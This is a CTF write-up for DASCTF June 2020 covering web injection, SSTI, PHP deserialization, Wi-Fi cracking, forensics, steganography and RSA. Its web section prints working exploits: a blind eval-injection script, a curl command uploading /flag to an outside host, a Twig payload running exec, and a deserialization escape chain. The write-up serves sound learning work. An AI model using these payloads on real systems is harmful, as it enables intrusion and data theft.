[DASCTF 2020.6]Write up

Got carried by my teammates; the big guys are just too strong.


WEB

Simple Calculator 1

Blind injection // copied straight from teacher Y's script

import re
import string

import requests

s = requests.Session()
u = 'http://183.129.189.60:10026'
q = ''  # value of the current arithmetic question; refreshed after every request


def get_question():
    """Fetch the page and evaluate the expression shown in <h4>...</h4> (trailing '=' stripped)."""
    global q
    r = s.get(u).text
    r = re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1]
    q = eval(r)


def submit_answer(i, c):
    """Send the correct answer with an injected comparison against byte i of /flag.
    'Congratulations' in <h3> means the comparison held; the next question is saved for the next try."""
    global q
    r = s.post(u, data={'input': str(q) + f" and '{c}'==open('/flag').read()[{i}]"}).text
    r0 = re.compile('<h3>([^<]+)</h3>').findall(r)[0] == 'Congratulations'
    q = eval(re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1])
    return r0


get_question()
ans = ''
for i in range(100):
    # string.printable also contains ' and \, which break the payload's quoting; skip them if they show up
    for j in string.printable:
        if submit_answer(i, j):
            ans += j
            print(ans)
            break
    else:
        break  # no candidate matched: end of the flag


Simple Calculator 2

Still blind injection; `read` is filtered, so build the name by concatenation.

/// Seems the data can also be exfiltrated directly with curl

exec("o"+"s.s"+"ystem('curl -T /flag ip:port')")
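As an added example (not from the page and not teacher Y's script), here is the same boolean-blind extraction run offline against a constructed stand-in for the calculator backend, with Calculator 2's `read` keyword filter in place. It assumes the backend compares `eval()` of the submitted answer with the question's value, which is my reading of the challenge, not something the page states. Two details differ from the script above on purpose: the payload is a conditional expression rather than `q and ...`, because `42 and cond` evaluates to the bool and never equals the expected answer, and `read()` is spelled by concatenation so the keyword filter does not match. The flag file, question and `demo()` helper are constructed.

```python
import os
import string
import tempfile

# Characters worth trying; repr() quotes each one, so quotes and backslashes are safe in the payload.
CHARSET = string.digits + string.ascii_letters + string.punctuation + " "


def calculator(expr, expected, blocked=()):
    """Constructed stand-in for the challenge backend: a keyword blacklist, then eval()
    of the submitted answer compared with the question's value. True plays 'Congratulations'."""
    if any(kw in expr for kw in blocked):
        return False
    try:
        return eval(expr) == expected
    except Exception:
        return False


def oracle_payload(answer, path, index, ch):
    """An answer that is only correct when byte `index` of the file equals `ch`.
    read() is spelled by concatenation so a 'read' keyword filter does not see it."""
    reader = f"getattr(open({path!r}), 'r' + 'ead')()"
    cond = f"{ch!r} == {reader}[{index}:{index + 1}]"   # slicing never raises past the end
    return f"({answer}) if ({cond}) else ({answer} + 1)"


def extract(submit, answer, path, charset=CHARSET, max_len=64):
    """Boolean-blind extraction: one oracle query per (position, candidate).
    The empty string is tried first at every position; it matches only past the end of the file."""
    out = ""
    for i in range(max_len):
        for ch in [""] + list(charset):
            if submit(oracle_payload(answer, path, i, ch)):
                if ch == "":
                    return out
                out += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at index {i}")
    return out


def demo(flag="DASCTF{constructed_fake_flag}", question="1+2*3"):
    """Run the extraction against the local stand-in with a constructed flag file."""
    with tempfile.NamedTemporaryFile("w", prefix="calc_", suffix=".txt", delete=False) as f:
        f.write(flag)
    path = f.name
    answer = eval(question)   # the solver computes the legitimate answer first
    blocked = ("read",)       # Calculator 2's extra filter
    try:
        return extract(lambda e: calculator(e, answer, blocked), answer, path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Each position costs up to `len(CHARSET) + 1` requests; against the real target the `submit` callback is the HTTP round trip from the script above, and the `blocked` tuple is whatever the keyword filter turns out to be.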


filecheck

Unintended solution.

There is a file-read function.

Cracking the sha256 gives chen.

While testing, the file-read page only accepted files ending in xyz. Further testing showed that as long as some submitted parameter contains xyz, the restriction is bypassed.

Blindly guessed the read page:

http://183.129.189.60:10023/read/?token=chen&file=/proc/self/cmdline&file1=xyz

Could read /etc directly.

Read /proc/self/environ:

Got the flag.

Subscribe

SMTP + Twig template injection

<?php
require_once "mail/smtp.class.php";
require_once "mail/smtp.send.php";
require_once "libs/common.func.php";
include 'vendor/twig/twig/lib/Twig/Autoloader.php';

function mailCheck($s) {
    if (preg_match('/\\\|\/|\~|&|\^|\`|\*|\?/i',$s))
    {
        alertMes('damn hacker!', './index.php');
        return false;
    }

    if (!preg_match('/libs|smtp|curl|dev|index\.php|ftp|backdoor|sh/i', $s) )
    {
        if (  preg_match_all('/@/', $s) === 1 )
        {
            $arr = explode('@',$s);
            $domain = end($arr);
            if (!preg_match('/[^a-z0-9._-]/i', $domain))
            {
                return true;
            }
        }
    }

    return false;
}

function alertMes($mes, $url)
{
    echo "<script>
            alert('{$mes}');
            location.href='{$url}';
    </script>";
    die;
}

$smtpEmailTo = $_POST['toemail'];

if (!mailCheck($smtpEmailTo))
{
    alertMes("hacker", "/index.php"); //die;
}

// To reduce load on the mail server, include $_POST['test'] with any fuzzing. Test thoroughly before subscribing and sending mail; a user detected sending mail frequently and mindlessly will be banned.
if (isset($_POST['test']))
{
    user_are_fuzzing_and_smtp_server_wont_send_email();
    die;
}

//do not trick
Twig_Autoloader::register();
$loader = new Twig_Loader_String();
$twig = new Twig_Environment($loader);
$yourName = pos(explode( '@', $smtpEmailTo));
$content = @$twig->render($yourName);
$mailcontent = "<h1>Hello <font color=red>".$content."</font><br>Welcome to DASCTF June, Have FUN!</h1>";
$smtp = new Smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
$smtp->debug = false;
$state = $smtp->sendmail($smtpEmailTo, $smtpusermail, $mailtitle, $mailContent, $mailtype);


/* flag is in flag.php */

https://xz.aliyun.com/t/7507#toc-3

Just tweaked it and used it:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("a=cat;b=flag.php;$a $b")}}@ha1c9on.top
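Added example, not the page's or the challenge's code: a Python port of `mailCheck()` with the same regexes in the same order, so a payload can be checked against the filter offline before it is sent (the source warns that frequent senders get banned). It assumes nothing beyond the PHP shown above; `rendered_part` mirrors `pos(explode('@', ...))`, and the `probe` helper and the candidate addresses are mine.

```python
import re


def mail_check(s):
    """Python port of the page's mailCheck(): same regexes, same order.
    Returns True exactly when the PHP version would return true."""
    if re.search(r"\\|/|~|&|\^|`|\*|\?", s, re.I):                 # the 'damn hacker!' list
        return False
    if re.search(r"libs|smtp|curl|dev|index\.php|ftp|backdoor|sh", s, re.I):
        return False
    if len(re.findall("@", s)) != 1:                                # exactly one '@'
        return False
    domain = s.split("@")[-1]                                       # end(explode('@', $s))
    return re.search(r"[^a-z0-9._-]", domain, re.I) is None


def rendered_part(s):
    """pos(explode('@', $s)): everything before the first '@' reaches $twig->render()."""
    return s.split("@")[0]


PAYLOAD = ('{{_self.env.registerUndefinedFilterCallback("exec")}}'
           '{{_self.env.getFilter("a=cat;b=flag.php;$a $b")}}@ha1c9on.top')


def probe(candidates):
    """Which candidate addresses survive the filter, without touching the mail server."""
    return {c: mail_check(c) for c in candidates}


if __name__ == "__main__":
    for addr, ok in probe([PAYLOAD, "{{7*7}}@ha1c9on.top",
                           '{{_self.env.getFilter("cat /flag.php")}}@ha1c9on.top']).items():
        print(ok, rendered_part(addr))
```

The second candidate shows why the usual `{{7*7}}` probe is useless here (`*` is on the first blacklist), and the third why the command in the payload avoids a leading `/`.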


phpuns

PHP session deserialization character escape

Seen this plenty of times.

Source was given:

<?php
class User{
    protected $username;
    protected $password;
    protected $admin;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
        $this->admin = 0;
    }

    public function get_admin(){
        return $this->admin;
    }
}


class Hacker_A{
    public $c2e38;

    public function __construct($c2e38){
        $this->c2e38 = $c2e38;
    }
    public function __destruct() {
        if(stristr($this->c2e38, "admin")===False){
            echo("must be admin");
        }else{
            echo("good luck");
        }
    }
}
class Hacker_B{
    public $c2e38;

    public function __construct($c2e38){
        $this->c2e38 = $c2e38;
    }

    public function get_c2e38(){
        return $this->c2e38;
    }

    public function __toString(){
        $tmp = $this->get_c2e38();
        $tmp();
        return 'test';
    }

}

class Hacker_C{
    public $name = 'admin';

    public function __invoke(){
        var_dump(system('cat /flag'));
    }
}

It hands us cat /flag directly, so just write the chain that calls it:

$a=new Hacker_A(new Hacker_B(new Hacker_C));

Note that c2e38 is checked for, but we have to use it, so replace it by hand with a hex escape (the S: string type):

O:8:"Hacker_A":1:{S:5:"c2\6538";O:8:"Hacker_B":1:{S:5:"c2\6538";O:8:"Hacker_C":1:{s:4:"name";s:5:"admin";}}}

The helper functions show the character replacement:

<?php
function redirect($path)
{
    header('Location: ' . $path);
    exit();
}

function add($data)
{
    $data = str_replace(chr(0).'*'.chr(0), '\0*\0', $data);
    return $data;
}

function reduce($data)
{
    $data = str_replace('\0*\0', chr(0).'*'.chr(0), $data);
    return $data;
}

function check($data)
{
    if(stristr($data, 'c2e38')!==False){
        die('exit');
    }
}

Won't go into the construction; log in with this username and password and you get the flag.

username:\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password: ";s:11:"\0*\0password";O:8:"Hacker_A":1:{S:5:"c2\6538";O:8:"Hacker_B":1:{S:5:"c2\6538";O:8:"Hacker_C":1:{s:4:"name";s:4:"test";}}}s:8:"\0*\0admin";i:1;}
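The construction the page skips, as an added example that is not part of the original writeup: `add()` turns the 3-byte protected-property prefix into the 5-byte literal `\0*\0` on write, and `reduce()` turns it back on read, so every literal `\0*\0` in the username shrinks by 2 bytes while the declared `s:70:` length stays. Those missing bytes are filled from the stream that follows; the 28-byte stretch `";s:11:"\0*\0password";s:152:"` (the username terminator, the password key and the password length header) is what has to be swallowed, hence 14 escapes. The code below is mine: `serialize_user` reproduces what `serialize()` emits for the User class, `unserialize` is a tiny subset of PHP's format (s, S, i, O only) written to check the result, and the chain closes all three nested objects with `}}}`.

```python
NUL = "\x00*\x00"   # real protected-property prefix that PHP's serialize() emits
ESC = r"\0*\0"      # the 5-character literal the challenge's add() writes instead


def php_s(v):
    return f's:{len(v)}:"{v}";'


def serialize_user(username, password, admin=0):
    """What serialize() produces for User with protected username/password/admin."""
    body = (php_s(NUL + "username") + php_s(username)
            + php_s(NUL + "password") + php_s(password)
            + php_s(NUL + "admin") + f"i:{admin};")
    return f'O:4:"User":3:{{{body}}}'


def add(data):      # applied when the session is written: 3 bytes become 5
    return data.replace(NUL, ESC)


def reduce(data):   # applied when it is read back: 5 bytes become 3
    return data.replace(ESC, NUL)


def check(data):    # the challenge's keyword check
    if "c2e38" in data.lower():
        raise ValueError("exit")


def unserialize(data, pos=0):
    """Minimal PHP unserialize for s, S, i and O (enough for this chain).
    Returns (value, next_position); objects come back as (class, {prop: value})."""
    t = data[pos]
    if t == "i":
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if t in "sS":
        colon = data.index(":", pos + 2)
        n = int(data[pos + 2:colon])      # declared length: this is what the escape abuses
        i = colon + 2                     # skip :"
        raw = ""
        while len(raw) < n:               # S: counts decoded bytes; \xx is a hex escape
            if t == "S" and data[i] == "\\":
                raw += chr(int(data[i + 1:i + 3], 16))
                i += 3
            else:
                raw += data[i]
                i += 1
        if data[i:i + 2] != '";':
            raise ValueError(f"bad string terminator at {i}")
        return raw, i + 2
    if t == "O":
        colon = data.index(":", pos + 2)
        n = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + n]
        p = colon + 2 + n + 2             # skip ":
        colon2 = data.index(":", p)
        count = int(data[p:colon2])
        p = colon2 + 2                    # skip :{
        props = {}
        for _ in range(count):
            k, p = unserialize(data, p)
            v, p = unserialize(data, p)
            props[k] = v
        if data[p] != "}":
            raise ValueError(f"expected }} at {p}")
        return (name, props), p + 1
    raise ValueError(f"unsupported type {t!r} at {pos}")


# Hacker_A -> Hacker_B -> Hacker_C chain from the page; c2e38 spelled as the S: hex escape c2\6538
CHAIN = ('O:8:"Hacker_A":1:{S:5:"c2\\6538";O:8:"Hacker_B":1:{S:5:"c2\\6538";'
         'O:8:"Hacker_C":1:{s:4:"name";s:4:"test";}}}')


def build_creds(chain=CHAIN):
    """Password: closes the username string, re-declares password and admin, closes User.
    Username: enough escapes that, after reduce(), the username's declared length
    runs exactly up to the start of the password content."""
    password = ('";s:11:"' + ESC + 'password";' + chain
                + 's:8:"' + ESC + 'admin";i:1;}')
    # bytes of the original stream the shortened username must swallow
    swallow = '";' + php_s(NUL + "password") + f's:{len(password)}:"'
    shrink = len(ESC) - len(NUL)      # 2 bytes per escape
    if len(swallow) % shrink:
        raise ValueError("swallow length must be even; change the password's digit count")
    return ESC * (len(swallow) // shrink), password


def simulate_login(username, password):
    """serialize -> add() on write, check(), reduce() on read -> unserialize, as the app would."""
    stored = add(serialize_user(username, password))
    check(stored)
    obj, _ = unserialize(reduce(stored))   # trailing bytes are ignored, as PHP does
    return obj
```

`build_creds()` returns exactly the 14-escape username and the 152-byte password above; the swallowed prefix is 25 bytes plus the number of digits in the password length, so only password lengths with an odd digit count (100 to 999 here) divide evenly by 2.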


MISC

cryptographic_call

BMP blind watermark, then base64 with a custom alphabet.


physical-hacker

Wi-Fi traffic analysis

aircrack-ng WiFi.cap

First get the SSID: DASCTF

aircrack-ng 1.cap -w /usr/share/wordlists/rockyou.txt

Password recovered: 66666666

airdecap-ng 1.cap -e DASCTF -p 66666666

This yields the decrypted traffic.

Export an archive from it; it contains flag.txt.

snow steganography

http://fog.misty.com/perry/ccs/snow/snow/snow.html

Decoding with an empty key gives

MZWGCZZANFZTUICOMVYHWNRXGBRDCNBXGI4GCZBZHEYDEYLFMNRGCMZSMUZDEZTBGRTDMYTEPUQGG33OM5ZGCZDVNRQXI2LPNZZSCIJB

Base32-decode it to get the flag.


BaiduYun&Gcode

Import the database.

Get the file size and md5.

Following https://blog.jixun.moe/du-code-gen

learned about an alternative Baidu Yun download method and obtained xshadow.png.

binwalk extracts a gcode file (3D printing).

http://gcode.ws/

Got the flag.

Keyboard

Memory forensics turns up a QWE keyboard cipher:

2020- 3-29 22:35:30

2020- 3-29 22:36:41
ctfwikiCRYPTO ABC
CTKQEKNHZHQLLVGKROLATNWGQKRRKQGWNTA

2020- 3-29 22:37:23
[BP][BP]decrypto hou xiao xie geng[BP][BP] yi kan chu

2020- 3-29 22:39:24
But the password is in uppercase

2020- 3-29 22:38:55
a

Got the encrypted disk password:

VERACRYPTPASSWORDISKEYBOARDDRAOBYEK

Mount the disk image; NTFS steganography.

Transparency

There is an archive in the alpha channel.

Brute-force the extraction password with Archive Password's mask attack; the archive password is nepnb.

Got the flag.


SMB

Memory forensics again; dump TrueCrypt.exe.

Did not find the key.

Later blindly guessed that the encrypted disk password was the administrator password:

qweasd!123

Mounted successfully. Got the file

<疫情xxxxxxxxxx>

Hex to characters

base58


CRYPTO

Gemini-Man

RSA factoring

import sympy

x = sympy.symbols("x")
# roots of the quadratic relating the two factors; written out for the decryption script below
a = sympy.solve([x*x + x - 7943722218936282], [x])
with open('list.txt', 'w') as fl:
    fl.write(str(a))

This gives

p and q

RSA with p, q, n and e known.

Blindly guessed e = 65537.

import gmpy2
from Crypto.Util import number

# p and q were pasted one per file after solving the quadratic above
with open('c:\\users\\admin\\desktop\\list.txt', 'r') as f:
    p = int(f.readline())

with open('c:\\users\\admin\\desktop\\list1.txt', 'r') as ff:
    q = int(ff.readline())

with open('c:\\users\\admin\\desktop\\C.txt', 'r') as fff:
    c = int(fff.readline())

e = 65537

d = gmpy2.invert(e, (p - 1) * (q - 1))   # private exponent from phi(n)
m = pow(c, d, p * q)                       # textbook RSA decryption

x = number.long_to_bytes(m)
print(x)
with open('list2.txt', 'w') as fl:
    fl.write(str(x))

Got the flag.
